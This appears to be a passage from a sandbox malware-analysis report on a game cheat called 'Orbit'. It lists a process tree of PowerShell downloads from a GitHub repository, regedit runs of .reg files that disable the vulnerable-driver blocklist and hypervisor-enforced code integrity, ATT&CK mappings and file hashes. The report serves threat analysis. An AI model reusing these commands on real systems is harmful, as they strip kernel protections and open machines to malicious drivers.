    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_nuke.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_nuke.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_overpass.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_overpass.txt'"
  2⤵
  PID:816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_overpass.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_overpass.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_vertigo.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_vertigo.txt'"
  2⤵
  PID:5116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_vertigo.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_vertigo.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1528
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c cd C:\Users\Admin\AppData\Roaming\Orbit && DisableVulnerableDriverList.reg && exit
  2⤵
  - Modifies registry class
  PID:4568
- - C:\Windows\regedit.exe
    "regedit.exe" "C:\Users\Admin\AppData\Roaming\Orbit\DisableVulnerableDriverList.reg"
    3⤵
    - Runs .reg file with regedit
    PID:3140
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c cd C:\Users\Admin\AppData\Roaming\Orbit && DisableHypervisorEnforcedCodeIntegrity.reg && exit
  2⤵
  - Modifies registry class
  PID:4936
- - C:\Windows\regedit.exe
    "regedit.exe" "C:\Users\Admin\AppData\Roaming\Orbit\DisableHypervisorEnforcedCodeIntegrity.reg"
    3⤵
    - Runs .reg file with regedit
    PID:3136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
786215d621c62808db41838ab0eaed0e

SHA1
4523db416bc6af244ae2469931ffd6b5e3c1f884

SHA256
ff2701ea42bf47e278767e23efb63a2ea53d196378beb4dde91d80de8c1309b0

SHA512
4e51539db5f23bdb2399ecfe3da2747943064cfabc5a018db67bb1ce9e08e68eaf02749831f435375f18bb164a4c424c380c75436b293054b37abb206433e051

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c1917c82a18ace07a9178013ee96018b

SHA1
88910d62a89e8cb29e7d4bee895baef19a4c5724

SHA256
d78c2661fa130db552ce15ce03a181191568190735c9b41a0b8a4ee4c270a6c2

SHA512
bc9233cab93c34b6434130648f389f39f908ba011e95757e5dfd6105d233664bff0856e0f355c2493f62bf70a0389159c42d8cf8bc62f8bacddb0fb22394dc8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d483c902bbd59ff8de0250bc3df2ddd4

SHA1
86098d56a1fa906a8a612cfc41f9febbee2e6320

SHA256
8f82a3ba8a5380b5960db280a28178759fc46325777c1a67ffef5fd9675a6d21

SHA512
7744b5c8a75eb211544c92f96d8569d3c59f8532be70d556a96a55a37cccb7df2e29fccb7fed2eaef6fd1e3f2fd40846fc993941bff81e19e1f0e94943b00e18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
03a443cbedc676d35a08d13508bc0897

SHA1
ce49f28ef4f27220149ece7ecf5424d97d8ce70e

SHA256
76f122d149564c521864f9a4d5681f2c93238574153c7c774c133d0c8ecf732b

SHA512
82c2cdb1e945882b188a11b8886df89d2c55c9c7f1fe631a3c0a6e863961d80b6b34fcc36a9c0a16847ef1f2693d6b25b84ed13529f34ff5bd93c487a1f9d8dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8c3b6685722acf6ecdcfeb9f2927d8bf

SHA1
d3e00b6985884c4fec6e683bd0b22bd4a03d9a9e

SHA256
892e61d342cba42d791ce0048bdead15ca44ce958cf568935a182f89cc931442

SHA512
84606615528eee4e2fb5fa0b8373dde9baad1783a92b1ac2d26c96379d388f5a5ab9e58794dc21a782b6f1fad347e10f9c85ab3444369a2b1dd65ef4f90a1085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20e27529677966a2c3646ad02b8d0a41

SHA1
e157675f581ee0dad4a8d24811fc76427b18afc7

SHA256
2f92d95270b42ac388d72a878888eda5270c77116bb9aa3c77fdc21e38f46045

SHA512
64937f161fcd2d7062f972281e96c50b2f91d6e614069f3a89f342a79bffe87de28b35a334b0b6b39062a35ca7530d75d2342e81cf34e0a12904122fe3d14466

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
15499dcdbbe05bff2f86b9a8218c2179

SHA1
f74d8b5f826bf5ce9aa3aed103c1e58595b290fc

SHA256
1df0fe729fa24afe247b6b5f759f33926681d9c5feb76740d29480f5d08e88a7

SHA512
642978d42d1b6861dda409a6552d2ed9206d0ad9a0048195966aed949643076c8138c6ce70e46951733dac5b3ce6844ba96d1b4204c64fd30da96f6b80d49573

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
95b2a45dd1d90f31ba1210ad4c698791

SHA1
70d27d1882b6b14bc3189eb3275b07c79c6394cb

SHA256
3ad7433ceebee9ddb67644a52277466034ad4fd60de43253d7431c797f090b10

SHA512
48f0600597f1fcf466bef218749d4ab68a3eaa6da493625acd8f70ea1ccfbc7a7267c151508f3874db8ca7343f2f6df16506ef3ec3e9abffb548793c73c86a8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
25dbc4b12d36cc429721596ba79fd699

SHA1
ddafc93cf6135ad8ae4b06100cb5d6b93e1781a2

SHA256
b1144557386ffc975b00279ffd15df0942f3eddfeb9aee622e31251c6eee1b36

SHA512
c9477301ba943c3075c323173db986255f4accf648b4d0089f35ca1a3e827a7260121318b8222c3847c35a5e1bdb0d546be854cefdfe8a0c335caddadd7762c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3f87c6ded99d54ea3a40a400d3e6d966

SHA1
d111ce4911f39f59a4c29a0d1147b468fa7d6d84

SHA256
c6ed9e8a75c1b257248ba96c447956ee8d926b0c44f7cf6505a1622c0864510b

SHA512
9eea794b3ea8e24bdb2babb50e10a9e1c08bef2fac9b409dfdb8cc627301b85bf42d83f1f084d98c17c306e3a9935f38afbcf62659355bc201ac7060aa96cf49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c3b18c6d294cff022d7ed322b40c6c92

SHA1
a551aeadce291eb8409365b9b8f93463bd790717

SHA256
5b335df3943f5787f1081fcca99f888cd82123c577f33ee5875c1c315cb0bdc1

SHA512
0367b620e73a7e6adab81e0afe1f81af7add99c1b923583be0f0e59f35f0e06dbda70bc4f208235a480e236110e896150bb89dc1f8a9262f26b69c5c1713248c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5456142b0db59e7a71c3dca158e8ae8c

SHA1
4c82205c1540d3143274a0f584879fe8516d1a68

SHA256
d5e3302f1c2ac338f82e4cbe53f291907141d90f4292a318ecfbee1858b8b542

SHA512
4d2dde14643ba74b0e9f317d9a506b6fb42e98e99c69e75e889b434aab54fc7737e60ff4aeeed105149b6561e0ff7545b30289a0a046b9ec63e14465f1740e24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cf5c453bffc908ea244029926bf4a21f

SHA1
6e54fb590955f75c9026808dc70ca65d70d6cb86

SHA256
3df1daa91cc8eb2340de7e3f2eefa0faabab777fe2f4ff09e34ec2045d36c720

SHA512
cae880a8ee4b6c2db8e96051ffb2e577f7b352caeb3d097490f53bb595a63e9649bbe8e4bea211ffa7bc34f1ffff2080da2faceb659275920c695f226a2ddc83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf70beb3b9becbe80d6607a6090eb540

SHA1
2204ac90f686c957978137173f217067f2deb3d7

SHA256
6f562fc1e80fdc0fce0a0782e1ce5b9139086def4d9d47038b65e08cd988fb73

SHA512
676dd9cb5edb4f5accce4a43d245b2d39182cec8d753aaa58267781c01fddd18091bb7fd214177c7f6bbd4158ee7f9ad3f2e37006e6b920f65c1bcddf53ffcac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3f525715ce17fae6a13fcdd5d3f1af4a

SHA1
389832d3ff68267ef1f026f22c18441bbb050b4c

SHA256
a282ffec81a6365dc160b9b57bd1c87bd7794f9663301b8513dccc5f181f9760

SHA512
b94abdbbceb5e2c6234ae8652bf872bdbec5aa0c3b117577459b20d13fa32142168413f9d5ad4d48837cb69a9509c85890d5709f0fac14b0720b5c7df331aa10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cf55a405886773a3bdef48ebaf0500a2

SHA1
99ed8948e11f3d8142b342f6eb11395af0959942

SHA256
c0fe401b684aea2052fe1bc52a140fd00bbbc9b866eacf9d820862523f2511a0

SHA512
1f33ee4963e5ca2a8524c5fd47939ff716744ee16ecd093c91193598ee09410341ea7bffeb37bc821d5127a6bd5d5e52a00703ade4b1b091c831d7721e66ff06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
469ab1bb8e01025a2fc56ecde025ed37

SHA1
534d072cc5aa667654b79bc0ba86e71a2e692c95

SHA256
2081ff042ea70f5edf8bf5fc4376620b3c84a0b28735da038c195ac895f0e6ea

SHA512
16cb8daa74d4b110e19ccb6a1143df7ca02ccbfd0bef548ef7878a50655c0dab3d8307d4f2b5a437ee0875bdb7fe3d4055d030eb30d61348288fa3a09afc3d3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
00936ef4b2c6705f9df47578bbd3a05e

SHA1
1228f3370c4cf80c61cdedf7d82f0dcd7c99e3f8

SHA256
113ccbde9c7ac2a595e258e39810786a8ba53b8409949697a86c38c0b481ecc3

SHA512
745db621e84f972b38e40246b4ecc3d6a42975911005948a294567f71450033d4476930e9b2acfe1adc9aabdaf78da9db42b8c0369bbf27d4d52f86e389612fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aad992f16e29798119848ab5af1127e0

SHA1
1a31983afcb7a0cc17e915d10d832affc8f8ff69

SHA256
6cb428ee536264f0a786b2c1fc493079252c221aadb3c5d6daca36b8b8df5ffe

SHA512
4c9321fd313bd555327cff288a21c19ccc6a367d9ea804ee668a979c95165eb73ebd458db5b1590a3f86084d79e9b589a7bb9b7e772e167421663c687c54dd39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33b3fd823821c09b091224ef7a8d3942

SHA1
c6a9dd80a6211acffdac03f8cfe9fa5c8f087f90

SHA256
db25caad5416712d8c5885c069a19de791ec76e7e16ba3ba98e3b764edf231ec

SHA512
f474d3bd86b9cbc80c679bb693c402d3466bc51fa7f1b8dfbe7010a700fe31b895378572ff91c572b3864e4d30b37721bb2f50e5eb0b8075d4d0e793082e3fc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a46912e6eb2a9d3b25549d2660307e58

SHA1
d5a27766cb3cee9efd06a04645007a3b0f0a3c52

SHA256
82fa34954ad2c479c5cf3dd870ff66523ec4c92f7cb3cd75260f1d9e02400eac

SHA512
d7179ac67f7c10186821521fe99c29fd604b6b5cee4d141a86edec494fa68ca9d0c84cbc506f69280e2b842f1693611396f42c2311d4612ef85f478d83c5fcc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ozsayzn3.bg3.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Orbit\DisableHypervisorEnforcedCodeIntegrity.reg

Filesize
173B

MD5
dd243eb0a44f50ca37d79fdaf301d98e

SHA1
e75417c31ad7e11e248180277532a7644aad3f15

SHA256
86554a668bec8cda1dd60c3256ab0eba14251b8bd9958f5bd7bb5109dbf63e83

SHA512
fd927c3918a6bad0fce12e9d63fe8d3cdb82664f7e7c522d9b09e9d5cffd2f9fe968cefa83ead42185348523bf7eb7c8d3a0a0389c9858069bf25d09a638fdea

Download Submit
C:\Users\Admin\AppData\Roaming\Orbit\DisableVulnerableDriverList.reg

Filesize
155B

MD5
efc53212201c2dfc033dd1f86fccab58

SHA1
3e539ce67bca171b2cf16c2dfc84f8555e87e8a6

SHA256
555e773f0cbc2178e71259bc42ac325761841f25ef6ce4eb9ce6bc9f55176f64

SHA512
3bcc15b08325921358d9a6113e0a8f08cefd7093e4927aeb2bb2fed4761ffd539c6ea9358101044dc0d443b9e79c69ad7f582300b0da894ace075b549e023479

Download Submit
memory/4508-25-0x00007FFF5DA70000-0x00007FFF5E45C000-memory.dmp

Filesize
9.9MB

Download
memory/4508-3-0x00007FFF5DA73000-0x00007FFF5DA74000-memory.dmp

Filesize
4KB

Download
memory/4508-5-0x000002CECF480000-0x000002CECF4A2000-memory.dmp

Filesize
136KB

Download
memory/4508-6-0x00007FFF5DA70000-0x00007FFF5E45C000-memory.dmp

Filesize
9.9MB

Download
memory/4508-10-0x00007FFF5DA70000-0x00007FFF5E45C000-memory.dmp

Filesize
9.9MB

Download
memory/4508-9-0x000002CECF5B0000-0x000002CECF626000-memory.dmp

Filesize
472KB

Download
memory/4508-26-0x000002CED0250000-0x000002CED09F6000-memory.dmp

Filesize
7.6MB

Download
memory/4508-32-0x00007FFF5DA70000-0x00007FFF5E45C000-memory.dmp

Filesize
9.9MB

Download